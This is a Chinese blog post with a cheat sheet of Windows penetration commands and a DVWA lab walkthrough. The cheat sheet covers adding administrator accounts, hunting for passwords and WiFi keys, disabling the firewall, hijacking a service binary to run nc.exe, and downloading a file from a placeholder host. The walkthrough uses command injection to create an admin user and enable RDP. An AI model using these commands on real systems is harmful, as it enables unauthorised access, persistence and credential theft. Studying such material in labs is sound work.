windows渗透常用命令

最新推荐文章于 2024-05-23 12:30:00 发布
最新推荐文章于 2024-05-23 12:30:00 发布
阅读量764 收藏 7
点赞数 1
分类专栏: 安全 文章标签: windows 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45780190/article/details/121279036
版权

net 的常用用法

查看共享连接

net use

增加远程共享

net use host /u:user pass

查看域中当前的主机列表

net view /domain

查看当前域中的用户

net user /domain

增加一个本地用户

net user user pass /add

将新增的用户加到本地管理员组

net localgroup "Administrators" user /add

查看域中的密码策略

net accounts /domain

查看本地组

net localgroup "Group"

查看域中的组信息

net group /domain

查看域中指定组的成员

net group "Domain group" /domain

查看当前机器所在的域名

net config workstation

查看当前服务器所在的域名

net config server

系统信息相关命令
显示系统信息

systeminfo

查看远程主机的系统信息

systeminfo /S ip /U domainuser /P Pwd

显示进程和服务信息

tasklist /svc

显示所有进程以及DLL信息

tasklist /m

显示进程和所有者

tasklist /v

查看远程主机的进程列表

tasklist /S ip /v

搜索所有 pdf 文件

dir /a /s /b c:'.pdf'

显示服务信息

sc query

显示具体的服务信息(包括二进制路径和运行使用)

sc qc Spooler

找出文件名字包含 password 的文件

findstr /si 'password' .txt

搜索敏感文件名称

dir /s *pass* == *cred* == *vnc* == *.config*

更改服务的二进制路径

sc config upnphost binpath= "C:nc.exe"

修改系统服务的权限

sc config upnphost obj= ".LocalSystem" password= ""

检查系统服务的权限

accesschk.exe -ucqv "Authenticated Users" * /accepteula

检查指定服务的权限

accesschk.exe -ucqv ServceName /accepteula

检查指定组在指定目录下的写权限

accesschk.exe -uwdqs "Authenticated Users" c: /accepteula

网络信息
打印路由表

route print

保存当前主机上的所有WiFi信息

netsh wlan export profile folder=. key=clear

设置当前配置禁用防火墙

netsh advfirewall set currentprofile state off

设置端口转发

netsh interface portproxy add v4tov4 listenport=3000 listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2

开启远程访问
启用远程访问

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

启用远程协助

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

修改远程访问端口

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber /t REG_DWORD /d 12345 /f

注册表操作
查找注册表中的密码

reg query HKLM /f password /t REG_SZ /s

查询 winlogon 信息

reg query "HKLMSoftwareMicrosoftWindows NTCurrentVersionwinlogon"

使用 powershell
下载文件

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://blabla.com/test.txt','C:UsersadminDesktoptest.test')"

列出运行的服务

Get-Service I where object {$ .status -eq ''Running''}

举一个例子,在DVWA的命令注入中给靶机增加一个用户并远程登录。
下面我通过命令注入的方式,在windows创建管理员用户,并开启3389远程进行登录。
1.通过Kail Linux给Windows7增加普通用户
输入命令:127.0.0.1 && net user liuweijiang 123456 /add ,创建用户名为我的拼音的用户,密码为123456,执行结果如图1所示,下面会显示执行成功
在这里插入图片描述
图1

我们可以输入127.0.0.1 && net user 查看一下是否创建成功,结果如图2所示,可以看到成功创建了一个用户名为liuweijiang的用户

在这里插入图片描述

2.将普通用户提权为系统管理员
输入命令127.0.0.1 && net localgroup Administrators /add liuweijiang

我们可以输入127.0.0.1 && net localgroup administrators ,查看是否提权成功,结果如图3所示,可以看到administrators下存在为我们设置的新用户liuweijiang,代表我们创立的用户为系统管理员用户。
请添加图片描述

3.给windows开启3389端口
首先我们可以通过命令查看3389端口是否开启:127.0.0.1 && netstat -an,如图4
请添加图片描述

通过查看我们的3389是没有打开的,我们使用命令进行打开.
输入命令:
127.0.0.1 && REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 执行结果如图5所示.
请添加图片描述

我们可以再执行一次127.0.0.1 && netstat -an 查看3389端口是否成功打开,通过图6所示,3389端口成功打开。

请添加图片描述
图6
4.通过kail去远程windows的桌面
Kali上远程连接Windows系统的服务器我们需要安装两个工具,rdesktop和tsclient。
安装rdesktop,输入命令:apt-get install rdesktop

安装tsclient,输入命令:apt-get install tsclient

安装好后,我们进行登录输入命令:rdesktop 192.168.253.212:3389
成功连接后,我们选择其他用户,登录我们之前创建的新用户:liuweijiang

登录成功后,我们在命令行中输入whomis,如图7所示
请添加图片描述
请添加图片描述

作为实验后,记得关闭33589端口,输入命令
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

kb2414
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
metasploit常用渗透命令.zip
09-16
本资料“metasploit常用渗透命令”主要聚焦于Metasploit框架中的常用命令,帮助用户理解和掌握其核心功能。 在Metasploit框架中,主要涉及以下几个关键概念: 1. **Meterpreter**:Meterpreter是一种动态的、功能...
远程桌面mstsc情况下通过\\tsclient\盘符实现内容的拷贝
zhang6622056的专栏
05-03 1万+
在我们远程桌面的情况下一般需要拷贝内容: 拷贝内容的方式当然不是只有这一种。包括选项的一些勾选。但是个人觉得这个是最保险,而且可以行得通的: 现在将步骤一一列出: 1、客户端 开始-运行-mstsc 输入服务器账号密码 2、服务器端 开始-运行-\\tsclient\盘符 访问自己的机器。 3、拷贝即可
Windows远程登录时共享本地硬盘
热门推荐
寒星轩
07-24 2万+
Windows远程登录我想大家都用过。但是如果在远程登录的时候需要拷贝远程电脑上的文件或文件夹改怎么办呢?在知道下面这个小窍门之前,我是这样做的:         1. 远程登录         2. 在远程的电脑上创建共享文件夹         3. 在本地的电脑上通过网络共享拷贝文件或文件夹         这样做虽然可以达到目的,可是跟我下面要说的方法比起来却麻烦了许多(尤其是要拷贝
Kali渗透Windows服务器
最新发布
A_991128a的博客
05-23 655
本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下;1、 实战步骤一:生成setup.exe后门程序,即木马程序。(1) 打开kali终端,输入ifconfig, 得到本机ip为192.168.189.130。如下图:(2)输入以下命令,使用msfpayload生成名为setup的后门程序:如下图:(3) 进入setup.exe所在目录,修改属性:选择“允许以程序执行文件”。
开启rdp_RDP反向攻击
weixin_26757949的博客
01-13 980
RDP反向攻击介绍这里讲两种攻击方式:利用挂载盘符进行攻击利用CVE-2019-0887进行攻击两者都是在攻击的登录远程桌面时,向攻击者PC的启动目录写入恶意文件,需要重启才能运行恶意文件。我这里测试的时候,存在很多问题,尤其是后者,较不稳定,按照严格意义并没有复现成功,也许是操作系统问题,也许是代码问题。利用挂载盘符原理是通过访问tsclient,并通过目录遍历找到启动目录,将恶意文件...
WIN7下远程连接无法访问本地资源
利孜的程序园
12-31 999
问题:WIN7下使用远程连接时,虽然已经在选项中选择本地资源,但连接上后还是无法访问本地硬盘。 解决方法1:在地址栏输入\\tsclient\c,最后的C改成已经在选项中设置可以访问的盘符号。但是用此方法只能打开文档之类的,无法将本地资源复制到远程连接的电脑上。 解决方法2:在本机运行里输入mstsc -admin,使用管理员权限进行远程连接,就可以看到设置可以访问的盘符了。
远程桌面上的 本地资源图标无效
weixin_30593443的博客
12-16 369
远程服务器,本地资源的图标找不到 找到本地资源的D文件夹 一、可以直接我的电脑输入 “\\tsclient\d” 二、开始+f 键 输入“\\tsclient\d” 转载于:https://www.cnblogs.com/dzlffmx/p/4166406.html...
常用Dos命令.txt
07-28
一些Windows中常用的cmd命令,一般网络安全工作从业者常用,一般用于主机渗透,主机攻防,配合一些漏洞会达到意想不到的效果,欢迎下载,欢迎讨论,欢迎补充。
常用的黑客DOC命令
01-03
下面,我们将深入探讨一些常用的黑客CMD命令及其在Windows环境中的应用。 1. **系统信息获取**: - `systeminfo`:显示系统的详细信息,包括操作系统版本、硬件配置等。 - `ipconfig`:查看网络配置,包括IP地址...
windows系统基础.rar
05-16
在“windows系统基础.rar”这个压缩包中,包含了一系列关于Windows操作系统、命令行以及相关编程开发和黑客渗透的基础知识。这些资源旨在帮助用户深入理解Windows系统的基本操作,并且通过CMD命令行来提升效率。以下...
web安全渗透测试.7z
04-08
在Web安全领域,渗透测试常常涵盖SQL注入、XSS攻击、文件包含漏洞、命令注入、权限绕过等测试项目。 【压缩包子文件的文件名称列表】 1. **lanmp.sh** - 这可能是一个安装LAMP(Linux, Apache, MySQL, PHP)环境的...
春秋云镜靶场挑战——Tsclient
Cobra的博客
03-25 2548
目标IP:39.98.73.212 网络拓扑 入口机器 1、使用namp对目标IP进行扫描,发现目标开放了1433端口(MSSQL服务),3389端口(RDP服务) 2、可以先爆破MSSQL服务,如下可以看出成爆破出密码 3、使用MDUT工具连接Mssql 4、使用xp_cmdshell执行命令发现只有一个比较地低的权限 5、使用CS生成木马,利用MDUT上传木马 6、执行木马上线CS C:/Users/Public/beacon.exe 7、使用土豆提
tsclient 全屏切换 -- Ctrl-Alt-Enter
ycyuxin的专栏
10-19 573
<br />-
linux终端访问tsclient,linux远程连接windows(tsclient)
weixin_39538500的博客
05-09 932
Terminal Server Client(tsclient)是一个用于rdesktop的前端。它支持大多数rdesktop,tsclient是图形界面,命令行输入tsclient打开主界面,输入远程计算机IP,用户名和密码就可以连接。使用tsclient,必须安装rdesktop.tsclient安装成功后,可从菜单应用程序->Internet->终端服务客户端 打开.参数,能在Microso...
使用远程桌面连接无法显示本地硬盘解决方法
李振的博客
05-12 2573
   远程桌面客户端和服务器端都设定了允许本地磁盘映射,但不能访问本地硬盘并且不能复制粘贴,解决方法入下:   第一步:     打开“组策略”     在"运行"中输入gpedit.msc 在“计算机配置”--&gt;“管理模板”--&gt;“Windows 组件”--&gt;“终端服务”--&gt;“客户端/服务器数据重定向”--&gt;“不允许客户端驱动器重定向”,看一下该项的属...
渗透测试之内网渗透中的数据传输
Blood_Pupil的博客
07-01 1588
DNS隧道
ubuntu9.10 的远程桌面客户端工具tsclient
周海汉的开发专栏
11-26 4713
周海汉 /文09.11.26 需求来源,linux对windows远程桌面进行管理,操作服务器数据库和网站等。linux 下有时候也需要对windows服务器进行管理,访问windows的远程桌面。这可以用rdesktop。而tsclient可以通过rdesktop对windows远程桌面进行访问,不过需要windows 打开终端服务。tsclient除了支持rdeskto
渗透测试】Tsclient-春秋云镜 极致的工具化打法!
m0_74272345的博客
10-03 551
这个靶场是纯Windows靶场,有很多难点,也有很多可扩展学习的地方。fscan爆出MSSQL弱口令,通过MDUT工具拿下WIN-WEBRDP贯穿整个内网渗透的思路,是这个靶场的核心john用户用tsclient挂载C盘到WIN-WEB,把域内主机用户密码给泄露了,可以做密码喷洒攻击(密码碰撞)映像劫持提权:放大镜这个是直接拿WP的用,可以扩展学习impacket工具包的使用作为一个学习渗透从B站红队笔记开始的人,春秋云镜的靶场很多的使用工具让人有点略微不适应。
i春秋云镜之Tsclient
weixin_65550121的博客
12-15 1016
因为它在远程连接我们的时候把磁盘也挂载过来了,这里由于我们不能让对面那台主机重启所以我们不能通过写启动项的方式让他上线但我们在对方的C盘发现了一个用户以及提示的信息接下来就是进一步的操作这里先把权限切换到John用户。因为对方远程登录的是这个桌面这里切忌一定不要远程上去你一旦远程上去 对方的连接就会断开 他的C盘也会断开所以你收集不到他的磁盘信息了迁移到John的进程上去。我们可以发现这里面都是windows的机器,我们先提权。我们发现是权限是mssql权限,所以我们需要提权。
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
1.2、端口连接 1.3、配置文件 1.4、用户信息 1.5、内网主机发现 1.6、会话收集 1.7、凭据收集 1.9、域信任 1.10、域传送 1.11、DN

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值